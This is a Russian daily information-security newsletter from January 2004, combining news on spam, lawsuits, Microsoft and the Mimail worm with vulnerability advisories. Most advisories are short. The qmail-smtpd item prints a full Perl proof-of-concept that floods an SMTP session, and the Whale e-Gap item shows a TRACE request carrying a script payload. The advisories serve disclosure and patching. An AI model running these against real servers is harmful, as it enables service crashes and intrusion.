Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru


Новости информационной безопасности Стратег.Ру
Ekey.ru Удостоверяющий Центр"

18.1.2004 - 19.1.2004

Содержание


Исследования, открытия, лабораторные разработки

СИСТЕМА RealSecure Server СЕРТИФИЦИРОВАНА ДЛЯ РАБОТЫ НА ОС Windows Server 2003 И Windows 2000 Server

19 января | infosec.ru

Система обнаружения и предотвращения атак RealSecure® Server 7.0 компании Internet Security Systems (ISS) получила 6 сертификатов соответствия "Certified for Windows". Они выданы по результатам тестирования системы RealSecure Server 7.0, которое выполнила лаборатория VeriTest, уполномоченная корпорацией Microsoft. Система RealSecure Server 7.0 стала одной из первых систем обнаружения и предотвращения атак уровня узла, получивших такие сертификаты.

Полученные сертификаты удостоверяют, что система RealSecure Server 7.0 соответствует требованиям компании Microsoft и ее можно устанавливать на операционных системах:

  • Windows Server 2003 Standard Edition
  • Windows Server 2003 Enterprise Edition
  • Windows Server 2003 Datacenter Edition
  • Windows 2000 Server
  • Windows 2000 Advanced Server
  • Windows 2000 Datacenter Server

без риска нарушить работоспособность компьютерных систем, снизить их защищенность или потерять данные.

Программа "Certified for Windows" устанавливает высокий технический стандарт для идентификации тех приложений, которые безопасны и, управляемы, а также надежно работают на операционных системах семейства Microsoft Windows. Приложения, сертифицированные для работы на платформе Windows, обеспечивают поддержку мобильного пользователя, а также отличаются упрощенной инсталляцией и деинсталляцией, что прямо вытекает из их надежности и управляемости. Приложения, сертифицированные для Windows Server 2003 и Windows 2000 Server, имеют более высокую надежность и низкую стоимость владения по сравнению с несертифицированными приложениями.

Полный отчет о тестировании размещен здесь.

Система RealSecure Server Sensor предотвращает вредоносную активность, направленную против критичных узлов корпоративной сети. Принцип действия системы основан на анализе поведения. RealSecure Server Sensor активно блокирует переполнение буфера, "неправильные" пакеты, доступ к корневой директории и другие виды атак. Предотвращение атак основано на комбинации анализа протоколов и сведений об уже известных атаках, что обеспечивает наиболее точное обнаружение атак, необходимое для их предотвращения.

Система RealSecure Server Sensor использует механизм корреляции событий и анализ атак - она постоянно сравнивает и анализирует образцы известных атак, обеспечивая на основе этого диагностику "реальных" и отсеивание ложных атак в режиме реального времени. При этом система RealSecure Server Sensor, являющаяся средством защиты узлов сети, полностью интегрируется со средствами защиты от сетевых атак.

Централизованное управление через консоль управления ISS SiteProtector™ обеспечивает сбор, корреляцию и анализ данных.

RealSecure Server Sensor поддерживает множество операционных систем, включая Windows, Solaris, HP-UX, AIX и Linux.

"Сертифицировав систему RealSecure Server Sensor 7.0 для шести платформ, компания ISS заверила своих заказчиков в надежности этого продукта, - говорит Катрина Тиг, вице-президент по маркетингу и решениям VeriTest. - Спецификация приложения для Windows Server, которая служит основой процесса тестирования, отличается весьма высокими требованиями. Результаты тестирования - несомненный успех ISS, и это сулит большую выгоду заказчикам ее продукции".

Итоги распространения спама за 2003 год

19 января | compulenta.ru

2003 год заставил всех по-новому взглянуть на проблему спама. Теперь это не только угроза личному времени и эмоциональному состоянию. Повились вирусы, которые используют, и довольно успешно, спам-технологии. Например, Sobig.f на пике своей популярности находился в каждом 20-м письме.

Несмотря на применение новых технологий защиты, которые вводили провайдеры и частные компании, ощутимых успехов пока не достигнуто. Спамеры тоже не дремлют и приспосабливаются к новым условиям существования. Теперь они рассылают троянские программы, которые, заражая машины пользователей, служат площадкой для рассылки спама. В рассылках участвуют сотни тысяч зараженных компьютеров, пользователи которых могут об этом даже не подозревать. В этом случае очевидна неэффективность фильтрации писем по IP-адресам, которая худо-бедно работала до последнего времени. Лингвистический анализ текстов тоже не дает результатов. Любой пользователь Рунета мог видеть, что осенью 2003 года спамеры впервые решили пожертвовать читаемостью писем ради обхода фильтров. Специально сделанные грамматические ошибки, удвоение букв, мусорные концы слов позволяют сразу отличить "на глаз" спамерскую корреспонденцию от обычного письма.

Не остается ничего другого, как анализировать ситуацию, выделять уязвимые места спамеров и создавать или совершенствовать нынешнюю защиту. Компания "Ашманов и партнеры" подготовила аналитический отчет, где были приведены факты о распространении спама в 2003 году. Данные основаны на анализе огромного потока писем, который обрабатывается разработкой этой компании, фильтром "Спамтест", во многих крупных организациях.

Итоги, как и прогнозы, весьма неутешительные. В 2003 году впервые сложилась ситуация, когда доля спама в почтовом трафике превысила долю обычных писем. Это данные из зарубежных источников. Но в Рунете ситуация не многим лучше. Почтовая служба "Яндекса" объявила, что доля спамерских писем в почтовых потоках составляет не менее 40%, при этом в отдельную группу выделяются так называемые "рассылки", доля которых может составлять до 20% почтового трафика. Таким образом, общий объем массовой непрошеной корреспонденции может достигать 60-80%. По данным почтовых служб "Рамблера" и Mail.ru, спам также занимает до 80% почтового трафика.

Аналитики отмечают не только количественное, но и качественное развитие спама. Меняется содержание писем. В Рунете отмечен резкий рост числа предложений товаров и услуг, и, соответственно, снижение относительных долей предложений "для взрослых" и откровенного мошенничества. Изменения касаются именно долевого распределения тематик. В количественном плане предложений "для взрослых" не стало меньше. Оправдались прогнозы о распространении политического спама. Он активно использовался в избирательной кампании 2003 года на всех уровнях. А во второй половине 2003 года широкое распространение получил спам с предложениями купить антиспамерское программное обеспечение.

В Рунете, как и во всем мире, наблюдается "укрупнение" спамерского бизнеса. Ведь, по сути, это весьма успешная реклама. Разговоры про огранизованную киберпреступность звучат все громче, и настало время всерьез задуматься об эффективных мерах защиты. Ведь, к сожалению, будущее не сулит пока ничего хорошего. Аналитики компании "Ашманов и партнеры" предрекают, что 2004 год будет годом пика спама. Они предполают, что количество спама в ящиках пользователей достигнет своего максимума весной-летом 2004 г. и составит 60-70% от всей входящей почты. Спам будет чрезвычайно технически изощрен, а кроме того, начнется эпоха мобильного спама (SMS-спама).

Зачем Microsoft продлила поддержку Windows 98

19 января | ibusiness.ru

Ровно неделю назад корпорация Microsoft обнародовала новые планы относительно поддержки операционных систем Windows 98, Windows 98 SE и Windows Me. Ранее, напомним, предполагалось, что выпуск обновлений и патчей для ОС семейства Windows 98 будет прекращен 14 января 2004 года, а для Windows Me - 31 декабря 2004 года. Однако неожиданно софтверный гигант пересмотрел собственные планы, продлив поддержку вышеназванных операционных систем на два с половиной года - до июня 2006 г.

Официальной причиной внесения изменений в график предоставления поддержки называются многочисленные жалобы со стороны пользователей Windows в развивающихся странах, которые оказались просто-напросто не готовы платить сотни долларов за более современные ОС Windows 2000 и Windows ХР. Однако, по мнению сотрудников аналитической компании Gartner, истинная причина заключается несколько в другом. Дело в том, что на сегодняшний день операционная система Windows 98 установлена на 26,7% всех компьютеров в мире. А к концу нынешнего года данный показатель должен сократиться практически вдвое - до 15,3%. Естественно, пользователям придется искать замену морально устаревшей платформе, и многие из них, конечно, выберут продукцию Microsoft. Другие же, напротив, попытаются перейти на более дешевые ОС на базе открытых исходных кодов, в первую очередь, на Linux. Понятно, что для софтверного гиганта такое положение дел неприемлемо, в связи с чем корпорация и пытается удержать клиентов, предлагая им дополнительную поддержку старых операционных систем.

Стоит также заметить, что Microsoft в ближайшее время намерена провести крупномасштабную агитационную кампанию против Linux, расписав преимущества Windows в фактах и цифрах.


Регулирование: Законы, постановления, сертификация, контроль

Двое предпринимателей подали иск против крупных интернет-компаний

19 января | ibusiness.ru

Интернет-предприниматели Трой Джавахер и Фрэнк Уэйер подали в окружной суд штата Калифорния иск против компаний Network Solutions и Register.com, обвинив их в нарушении патента за номером 6,671,714. Данный патент, зарегистрированный 30 декабря 2003 года, описывает способ сопоставления URL доменов третьего уровня с адресами электронной почты. В частности, если URL записывается как www.john.smith.com, то ему соответствует почтовый аккаунт john@smith.com. Другими словами, точка, отделяющая имя от фамилии (или первую половину URL от второй) просто заменяется символом "@".

В своей жалобе Джавахер и Уэйер, буквально на днях основавшие фирму Nizza Group, обвинили Network Solutions и Register.com в незаконной торговле доменами и еmail-аккаунтами в зоне .name. Нужно отметить, что права на вышеназванную доменную зону принадлежат компании Global Name Registry (GNR), а ответчики по иску Nizza Group лишь являются дилерами. Однако, Джавахер и Уэйер сочли, что справиться с Network Solutions и Register.com будет намного проще, чем с GNR. При этом истцы, хотя и требуют от руководства Network Solutions и Register.com выплатить компенсацию за нарушение патента и прекратить торговлю "незаконными" доменами, надеются, что ответчики изберут схему лицензирования.

Компания Global Name Registry, между тем, начала предлагать клиентам домены второго уровня, типа www.johnsmith.name, также соответствующие адресам электронной почты john@smith.name. Однако такие домены, в отличие от доменов третьего уровня, уже не попадают под действие патента Nizza Group и не могут послужить поводом для подачи иска.

Internet Explorer запретят

19 января | news.battery.ru

Чикагский федеральный суд подтвердил августовское решение суда нижней инстанции, по которому компания Microsoft должна выплатить 512 миллионов долларов компании Eolas за нарушение авторских прав.

Судья посчитал, что софтверный гигант действительно нарушил авторские права компании Eolas Technology, а также Калифорнийского университета, использовав в своих программах для работы с Интернетом кусок чужого кода.

Решение примечательно тем, что судья не только подтвердил денежный иск, но также наложил запрет на дальнейшее распространение программ, с фрагментами заимствованного кода. Однако данный запрет был приостановлен, на то время, которое отводится Microsoft на подачу апелляции.

Пиррова победа

19 января | @ASTERA

Громкое разбирательство между "ВымпелКомом" и его бывшим абонентом Олегом Чубаровым, обернувшееся для оператора серьезными неприятностями с Госсвязьнадзором, пошло на новый виток. В прошлую пятницу Савеловский районный суд встал на сторону "ВымпелКома". Однако адвокаты Чубарова говорят, что этот проигрыш позволит им скорректировать свои обвинения и подать против оператора новые иски, многие пункты в которых, по их словам, поддерживает начальник юридической службы Минсвязи Дмитрий Пархоменко.
Чубаров стал абонентом сети "Би Лайн" в конце 2002 г. , заплатив около $234 за подключение к безлимитному тарифу "Супер GSM". Однако после этого, по данным "ВымпелКома", он не платил в течение трех месяцев. В июле 2003 г. "ВымпелКом" подал на должника в суд, выставив иск о взыскании 21 040,71 руб. В ответ Чубаров в декабре 2003 г. обвинил "ВымпелКом" в незаконной деятельности. Он счел, что практика предоставления услуг одной компанией по лицензии другой противоречит Гражданскому кодексу и потребовал вернуть все уплаченные им "ВымпелКому" деньги.

"ВымпелКом" предоставляет услуги связи на основе генерального соглашения от 1997 г. со своей дочерней компанией "КБ "Импульс", владеющей лицензией GSM-900/1800 на Москву и Московскую область и соответствующей сотовой сетью. В декабре 2003 г. Госсвязьнадзор предписал прекратить эту практику до 1 февраля 2004 г. В ответ1 "ВымпелКом" намерен подать иск на Госсвязьнадзор.

В пятницу Савеловский районный суд частично удовлетворил иск "ВымпелКома" и постановил взыскать с Чубарова 16 000 руб. Чубарову в удовлетворении иска суд отказал. Представители обеих сторон не смогли объяснить, почему суд удовлетворил иск "ВымпелКома" не на всю сумму. Мотивация этого решения, согласно законодательству, станет известна позднее.

Адвокаты Чубарова Вадим Прохоров и Ольга Исаева вынесенное решение не считают существенным для исхода дела. По словам Прохорова, на процессе они сознательно отказались от обвинения в адрес "ВымпелКома" в незаконной деятельности и мотивировали встречный иск только невыполнением "ВымпелКомом" обязательств по абонентскому договору.

"Мы поменяли предмет иска, чтобы в нем не было взаимоисключающих мыслей - о незаконной деятельности "ВымпелКома" и о взыскании денег за неправильное исполнение этой деятельности", - объяснил Прохоров. Он подчеркивает, что решение суда промежуточное. "Мы будем обжаловать его, а по незаконной деятельности "ВымпелКома" предъявим отдельный иск", - говорит Прохоров, добавляя, что представитель Минсвязи Пархоменко поддерживает позицию Чубарова. С самим Пархоменко по окончании суда связаться не удалось.

Директор "ВымпелКома" по связям с общественностью Михаил Умаров также считает, что Пархоменко на суде поддерживал Чубарова. Тем не менее Умаров доволен итогами пятничного разбирательства. "Мы удовлетворены тем, что суд подтвердил нашу правоту, - говорит он. - Подавать апелляцию - вполне законное право оппонентов, но факты от этого не изменятся".

В этом раунде наблюдатели единодушно признают победу за оператором. "Решение суда показывает слабость утверждения, что у "ВымпелКома" нет оснований для предоставления услуг сотовой связи", - считает аналитик "Тройки Диалог" Евгений Голосной. Впрочем, оговаривается он, этот иск скорее всего не повлияет на дальнейшее развитие конфликта между "ВымпелКомом" и Госсвязьнадзором


Проблемные ситуации, информационная преступность, сетевые войны

Хакеры взламывают киберпространство

19 января | http://www.crime-research.ru/

Интернет-сеть в Корее - гордость нации (более 10 миллионов подключенных к Интернет пользователей). Однако специалисты отмечают и самый высокий в мире уровень несанкционированных проникновений. Согласно статистике Корейского Агентства Информационной Безопасности (Korea Information Security Agency - KISA), количество взломов отечественными хакерами за последние пять лет увеличилось в 165 раз и составило в 2003 году 26 179.

В 1998 году в правоохранительные органы были заявлены 158 случаев взломов, двумя годами позже эта цифра достигла 1 943, а в 2002 количество взломов резко возросло - до 15 192.

По данным Агентства, большинство хакеров атакует компьютеры, работающие под управлением операционной системы Windows, поскольку она довольно уязвима для работы в сети, по сравнению с другими, такими как, например, Unix. Однако большинство среднестатистических пользователей Интернет, используют именно Windows и остаются совершенно беззащитными перед хакерами.

Специалисты советуют пользователям быть более осведомленными об опасности взлома их компьютера и пытаться предотвратить утечку информации с их компьютера.

"Самой важное - это изменить отношение самих пользователей к этой проблеме. Они должны помнить, что постоянно рискуют быть атакованными хакерами пока их система включена и подключена к сети" - говорит Чо Ки-Хеум ведущий специалист Корейской Компании AhnLab - лидера в сфере компьютерной безопасности.

Пользователям компьютеров следует регулярно скачивать и устанавливать самые последние патчи и исправления ошибок в операционных системах своих компьютеров.

Эсперты также не рекомендуют пользователям оставлять незащищенными или легкодоступными файлы, содержащие важную информацию, которые можно легко найти на взломанном компьютере. Пользователям следует делать такие файлы трудно доступными для хакеров.

Установка Firewall - лучший способ оградиться от хакеров. Если все-таки пользователь подозревает или точно уверен, что его компьютер пытаются взломать, ему следует немедленно обратиться к соответствующим экспертам и правоохранительным органам, с целью предупреждения совершения компьютерного преступления или выявления преступника.

В Минске раскрыта Интернет-сеть, распространявшая детскую порнографию

19 января | http://www.crime-research.ru/

Федеральное бюро расследований и Генеральная прокуратура США раскрыли международную Интернет-сеть, распространявшую детскую порнографию. В организации ее деятельности ведущую роль играли белорусская компания «Regpay» («Регпэй») и американская фирма “Connections USA” («Коннекшнс Ю-Эс-Эй»).

Минская компания взимала плату с посетителей как минимум четырех платных порносайтов. Расчеты производились по кредитным карточкам. Деньги затем «отмывались» американской фирмой, главный офис которой находился в городе Форт-Лодердейл (штат Нью-Джерси), и переводились затем в латвийские банки. По мнению американской генпрокуратуры, «Регпэй» получила в общей сложности более 3 миллионов долларов от любителей разглядывать детское порно.

Расследование длилось около года. Летом 2003 года трое из четырех основателей белорусской компании были арестованы во Франции и Испании. В декабре они начали давать показания, на основании которых были предъявлены официальные обвинения президенту «Коннекшнс Ю-Эс-Эй» Юджину Валентайну. В минувшую среду он признал свою вину и рассказал о механизме «отмывания» денег для «Регпэй».

На сегодняшний день по «белорусскому делу», как его называют в средствах массовой информации США, в Белоруссии, Франции, Испании и Америке задержаны уже более 130 человек. В большинстве своем это пользователи детских порносетей. У них изъяты домашние компьютеры. 40 человек – американские граждане. Генеральная прокуратура США благодарит за содействие правоохранительные органы Белоруссии и других стран, принимавших участие в операции.


Технологии безопасности. Организации разработчики, интеграторы.

Rainbow представила новое средство защиты корпоративной информации.

19 января | ФЦП Электронная Россия

Компания Rainbow Technologies объявила об интеграции персонального USB-идентификатора iKey и технологии контроля доступа в здания с использованием бесконтактных карт на частоте 125 кГц от HID Corporation в единое устройство для безопасного доступа в здания и доступа к защищенным данным. Название нового продукта – RFiKey. Это первый в своем роде персональный идентификатор, выполненный для стандарта USB, который объединил в себе функции обеспечения защиты физического доступа в здания и доступа к критически важным для бизнеса данным и приложениям.

Владельцу RFiKey необходимо просто поднести устройство к панели считывателя запирающей системы двери производства HID и, если доступ разрешен, дверь будет открыта. На индивидуальном рабочем месте пользователь вставляет RFiKey в USB-порт ПК и входит в корпоративную сеть, используя персональный идентификационный номер (ПИН). Для перемещения по офису и доступа в закрытые внутренние помещения сотрудники компании должны носить RFiKey с собой. Если извлечь персональный идентификатор из USB-порта, сессия прерывается и блокирует внутренние попытки получить доступ к критически важной корпоративной информации. На российском рынке RF iKey появится в продаже в конце 1 квартала 2004 года в московском офисе Rainbow Technologies.


Информационая безопасность общественной коммуникации, личности.

ПИРАТЫ ВЫПУСТИЛИ НОВУЮ ВЕРСИЮ WINDOWS

19 января | park.ru

В ближайшие дни в России начнут продаваться пиратские диски с новейшей операционной системой Microsoft Windows Longhorn, официальный выпуск которой запланирован аж на 2005 г. В Microsoft говорят, что попавшая в руки пиратов версия еще далека от финальной и работать она будет ненадежно.
  ... Яшин считает, что пиратская версия Longhorn будет пользоваться хорошим спросом. "Огромное число людей приобретут ее просто из любопытства", - убежден он. С ним согласен Дмитрий Москалев, генеральный директор компании MONT, специализирующейся на дистрибьюции компьютерных программ. "Такие продукты вполне неплохо покупаются. Просто на всякий случай, чтобы были под рукой. Нелегальные диски ведь стоят очень дешево, - говорит Москалев. - Но установить эту версию Longhorn рискнут немногие - разве что только те, кто любит возиться с компьютером, как с конструктором".

Западные мобильные операторы устанавливают интернет-цензуру

19 января | www.runet.ru

Шесть крупнейших мобильных операторов совместно работают над проектом по защите детей от онлайновой порнографии и сетевых казино, доступ к которым осуществим через мобильные телефоны последнего поколения.

В первый раз подобная система цензуры была представлена для Интернета. 
 
«Orange», «O2», «T-Mobile», «Virgin Mobile», «Vodafone» и «3» запустили программу по установлению возрастного ценза для определенных веб-ресурсов. Данная инициатива была вызвана утверждением, что дети с телефонами 3G «бомбардируются» предложениями непристойного содержания, и/или получают доступ к онлайновому контенту, предназначенному для взрослых.

Саморегулирующаяся система должна оградить молодых пользователей от неконтролируемых онлайновых чатов.

Как свидетельствует Sky.Com , родители, приобретающие усовершенствованные мобильные телефоны для детей, должны исключить «неподходящий контент» с устройства. А продавцы должны обязательно проверять возраст потребителя. 

«Наша индустрия осведомлена о тревогах родителей», - комментирует координатор проекта Хамиш МакЛеод. – «Посредством введения данной системы кодирования, мы надеемся избавить их от серьезных переживаний».

цифры на стороне Microsoft

19 января | news.battery.ru

Прошло уже два года с того момента, как глава Microsoft Билл Гейтс обратил усилия своей корпорации на решение вопросов, связанных с безопасностью программного обеспечения.

Согласно мнению пользователей, компания начала делать на этом пути успехи, но многие проблемы еще не решены.

В январе 2002, Гейтс запустил проект под названием "Надежные вычисления", призванный усилить внимание работников Microsoft на создание более защищенных продуктов.

Сейчас Microsoft постоянно докладывает о масштабных изменениях, которые она внесла в своем подходе к безопасности. В качестве оценки действительных достижений софтверного гиганта – можно использовать данные статистики.

Для сравнения в течение шести месяцев после того, как была выпущена операционная система Windows 2000 было найдено 32 дыры в системах безопасности, 21 из которых имела статус критической. Уже прошло 6 месяцев, как Microsoft выпустило Windows Server 2003, найдено всего14 уязвимостей, лишь 6 из которых имеют статус критических. Цифры говорят сами за себя.


Дыры и патчи программ и операционных сред

Неправильная обработка некорректных запросов в nCipher payShield библиотеке

19 января | securitylab.ru

Программа: nCipher payShield Library 1.3.12, 1.5.18 и 1.6.18

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в nCipher payShield библиотеке. Библиотека не в состоянии обработать некоторые типы некорректных запросов.

payShield SPP библиотека может возвратить 'Status_OK' статут, когда правильный ответ должен быть несколько другим. Правильный статус будет правильно зарегистрирован, но не возвращен вызываемой функцией.

URL производителя: ://www.ncipher.com/support/advisories/

Решение:Установите обновленную версию программы.

Межсайтовый скриптинг в Symantec Web Security

19 января | securitylab.ru

Программа: Symantec Web Security 2.5, 3.0.0, и 3.0.1

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость в проверке правильности входных данных обнаружена в Symantec Web Security. Удаленный пользователь может выполнить XSS нападение.

Когда Symantec Web Security блокирует URL, страница отображает блокируемый URL без фильтрации HTML кода, содержащегося в этом URL.

URL производителя: http://www.sarc.com/avcenter/security/Content/2004.01.13.html

Решение:Установите обновленную версию программы (Symantec Web Security 3.0.1, build 62).

Обсуждение

DoS и неавторизованный доступ в HP SharedX

19 января | securitylab.ru

Программа: HP SharedX

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в HP SharedX. Локальный пользователь может получить доступ к файлам или вызвать условия отказа в обслуживании на системе.

Сообщается, что SharedX небезопасно обращается к файлам. Дополнительные подробности не раскрываются.

URL производителя: http://www.hp.com

Решение:Установите следующие исправления:

PHSS_29338 - B.11.00 and B.11.11
PHSS_29550 - B.11.22

Другие публикации:

DoS против OmniCom AlphaLPD print службы

19 января | securitylab.ru

Программа: OmniCom AlphaLPD 2.5

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в OmniCom AlphaLPD print service. Удаленный пользователь может аварийно завершить работу print службы.

Удаленный пользователь может установить более 200 подключений к целевой системе на 515 порту, чтобы аварийно завершить работу AlphaLPD службы.

Пример/Эксплоит:

URL производителя: http://www.omnicomtech.com/products/alphalpd.html

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Локальный root доступ в libDtSvc

19 января | securitylab.ru

Программа: CDE libDtSvc

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Переполнение буфера обнаружено в libDtSvc. Локальный пользователь может получить root привилегии на системе.

HP сообщает, что локальный пользователь может выполнить переполнение буфера, чтобы получить root доступ на систему. Дополнительные подробности не раскрываются.

Пример/Эксплоит:

URL производителя:www.hp.ru

Решение:Установите следующие патчи:

PHSS_28675 - B.11.00
PHSS_30167 - B.11.04
PHSS_28676 - B.11.11
PHSS_28682 - B.11.22

Другие публикации:

Отказ в обслуживании в в tcpdump в обработке ISAKMP пакетов

19 января | securitylab.ru

Программа: Tcpdump 3.8.1 и более ранние версии

Опасность: Средняя

Наличие эксплоита: Нет

Описание: Несколько уязвимостей обнаружено в tcpdump в обработке ISAKMP пакетов. Удаленный пользователь может аварийно завершить работу tcmpdump или заставить войти программу в бесконечный цикл.

Функция rawprint() в print-isakmp.c не в состоянии проверить входящие параметры [CVE: CAN-2004-0057]. Удаленный пользователь может послать специально обработанный ISAKMP пакет, чтобы аварийно завершить работу tcpdump.

Также сообщается, что удаленный пользователь может аварийно заставить tcpdump войти в бесконечный цикл [CVE: CAN-2003-0989].

URL производителя: http:// cvs.tcpdump.org/cgi-bin/cvsweb/tcpdump/print-isakmp.c

Решение:Установите обновление, доступное через CVS.

Удаленное переполнение буфера в почтовом клиенте Elm

19 января | securitylab.ru

Программа: Elm

Опасность: Критическая

Наличие эксплоита: Нет

Описание: Переполнение буфера обнаружено в Elm почтовом клиенте в 'frm' команде. Удаленный пользователь может послать специально обработанное почтовое сообщение, чтобы выполнить произвольные команды на целевой системе пользователя.

Удаленный атакующий может послать e-mail file с чрезмерно длинным полем заголовка, чтобы вызвать переполнение статического буфера и выполнить произвольный код на уязвимой системе.

Решение: Несколько Linux производителей выпустили соответствующие исправления

Просмотр исходного кода страницы входа в систему в Whale Communications e-Gap

19 января | securitylab.ru

Программа: Whale e-Gap 2.5

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Whale Communications e-Gap security appliances. Удаленный пользователь может просмотреть исходных код страницы входа в систему.

Удаленный пользователь может представить специально обработанный HTTP запрос, чтобы просмотреть произвольный код 'Whale Communications Login Page'. Пример:

REQUEST:-
TRACE /<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.0
OR TRACE / HTTP/1.0 

PARTIAL RESPONSE:-

<%@ Language=VBScript %>
<!--#include file="WhlCacheCleanFunc.inc"-->
<% Response.Expires = 0 %>

<HTML>
<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<TITLE>Whale Communications Login Page</TITLE>


URL производителя: http://www.whalecommunications.com/site/Whale/Corporate/Whale.asp?pi=30

Решение: Установите соответствующее исправление.

Удаленное выполнение произвольных команд в PhpDig

19 января | securitylab.ru

Программа: PhpDig 1.6.5

Опасность: Высокая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в PhpDig. Удаленный пользователь может выполнить произвольные команды на целевой системе.

Уязвимость включения файла обнаружена в 'includes/config.php/ в переменной $relative_script_path. Удаленный пользователь может определить удаленное местоположение для этой переменной, чтобы включить произвольный файл, который будет выполнен на целевом сервере с привилегиями Web сервера. Программа включает без проверки следующие файлы:

$relative_script_path/locales/$phpdig_language-language.php
$relative_script_path/locales/$phpdig_language-language.php
$relative_script_path/loca les/en-language.php
$relative_script_path/libs/phpdig_functions.php
$relative_script_path/libs/function_phpdig_form.php
$relative_script_path/libs/mysql_functions.php

URL производителя:http://phpdig.net/showthread.php?s=783cb331ff7333b423ba11da299e4033&threadid=393

Решение: Установите обновленную версию программы: http://phpdig.net/showthread.php?s=783cb331ff7333b423ba11da299e4033&threadid=393

Целочисленное переполнение буфера в FishCart shopping system

19 января | securitylab.ru

Программа: FishCart Shopping System 3.0 и более ранние версии

Опасность: Низкая

Наличие эксплоита: Да

Описание: Целочисленное переполнение буфера обнаружено в FishCart shopping system. Удаленный пользователь может вызвать ошибку расчетов.

Удаленный пользователь может представить чрезмерно большое количество заказанных покупок, чтобы вызвать целочисленное переполнение буфера, что приведет к неправильному подсчету стоимости покупки.

URL производителя: http://fishcart.org/

Решение:Установте обновленную версию программы (3.1).

Удаленное переполнение буфера в qmail-smtpd

19 января | securitylab.ru

Программа: qmail 1.03

Опасность: Средняя

Наличие эксплоита: Да

Описание: Две уязвимости обнаружены в qmail-smtpd. Удаленный пользователь может вызвать переполнение буфера и перезаписать память на целевой системе.

Georgi Guninski сообщил, что удаленный пользователь может подключится к системе с чрезмерно длинной SMTP сессией, чтобы аварийно завершить работу qmail-smtpd сессии. Также удаленный атакующий может вызвать переполнение буфера и выполнить произвольный код на уязвимой системе.

Пример/Эксплоит:

#!/usr/bin/perl -w

#Copyright Georgi Guninski\nCannot be used in vulnerability databases and 
#similar stuff
use IO::Socket;

my $port = $ARGV[1];
my $host = $ARGV[0];
my $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || die "socket";

my $req  = "HELO a\r\n";
my $fromaddr="they\@sux.org";
my $touser="postmaster";

print "qmail-smtpd SEGV. Copyright Georgi Guninski\nCannot be used in 
vulnerability databases and similar stuff\nWill connect to ${host}:${port} 
fromaddr=${fromaddr} touser=${touser}\n";

$req .= "MAIL FROM: ${fromaddr}\r\n";
$req .= "RCPT TO: ${touser}\r\n";

$req .= "DATA\r\n";


$req .= "1234567890";

#my $x = "\ng" x 100;
#print $x;

syswrite($socket,$req,length($req));

my $l1= 1024*1024;
my $p1 = "gg" x $l1;
my $pl = 2*$l1;
print "length=${pl}\n";
my $towrite = $l1*2050;
my $wri = 0;
$req = $p1;
while ($wri < $towrite)
{
syswrite($socket,$req,$pl);
if ( ($wri % $l1) == 0) {print "written=" . $wri/$l1 . "\n";}
# !!! uncomment the following lines to get qmail memory screw on 
linux according to gdb
#if ($wri/$l1 == 2044) 
#{
#syswrite($socket,"g\r\n",3);print "injected\n";
#};
$wri += $pl;
}

$req = "test\r\n";
$req .= ".\r\n";


syswrite($socket,$req,length($req));


while(<$socket>)
{
print $_;
}


close $socket;

URL производителя: http://www.qmail.org

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Повреждение памяти в The Bat!

19 января | securitylab.ru

Программа: The Bat! 2.01

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в The Bat! в обработке PGP подписанных сообщений. Удаленный пользователь может выполнить произвольный код на уязвимой системе.

Удаленный пользователь может послать специально обработанное PGP подписанное e-mail сообщение с множественными рекурсивно включенными MIME частями, чтобы вызвать переполнение буфера. Уязвимость не может использоваться для выполнения произвольного кода и вызывает ошибку только в собственном обработчике исключений.

Пример: http://www.security.nnov.ru/files/batcrash.msg

URL производителя: http://www.ritlabs.com/en/products/thebat/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Российский вирус мутирует

19 января | Cnews

В интернете зафиксирована массовая рассылка троянской программы Small.cz, которая загружает и устанавливает с удаленного сервера новую версию почтового червя Mimail - Mimail.P. Mimail, созданный в России и впервые появившийся на просторах интернета в начале августа прошлого года, является классическим почтовым червем, распространяющимся через электронные сообщения.

По данным «Лаборатории Касперского», уже зафиксированы отдельные случаи заражения этой вредоносной программой в разных странах мира. Новая модификация червя отличается от предыдущей версии использованием утилиты сжатия UPX. Это затрудняет обнаружение Mimail.P некоторыми антивирусными программами.

Зарегистрированная рассылка "троянца" маскируется под письмо от платежной системы PayPal, содержит подложный адрес отправителя "do_not_reply@paypal.com", тему письма "PAYPAL.COM NEW YEAR OFFER" и вложенный файл "paypal.exe". При запуске этого файла "троянец" соединяется с удаленным сервером, загружает оттуда дистрибутив "Mimail.P" и устанавливает его в систему.

После установки "Mimail.P" начинает процедуру распространения. Для этого он незаметно сканирует некоторые директории зараженного компьютера и считывает из них адреса электронной почты. Далее червь рассылает по этим адресам свои копии, используя встроенную процедуру для работы с электронной почтой.

Червь обладает опасным побочным действием, которое может нанести пользователям существенный ущерб. В частности, "Mimail.P" следит за активностью приложений платежных систем E-Gold и PayPal, установленных на зараженном компьютере, считывает из них конфиденциальные данные и отсылает на несколько анонимных адресов, принадлежащих автору червя. Таким же образом червь похищает с компьютера другие конфиденциальные данные, как то логины и пароли для работы с электронной почтой, системную информацию и др.




Инструменты управления содержанием Метод.ру
Дата создания документа: 16:21 19.01.04

http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное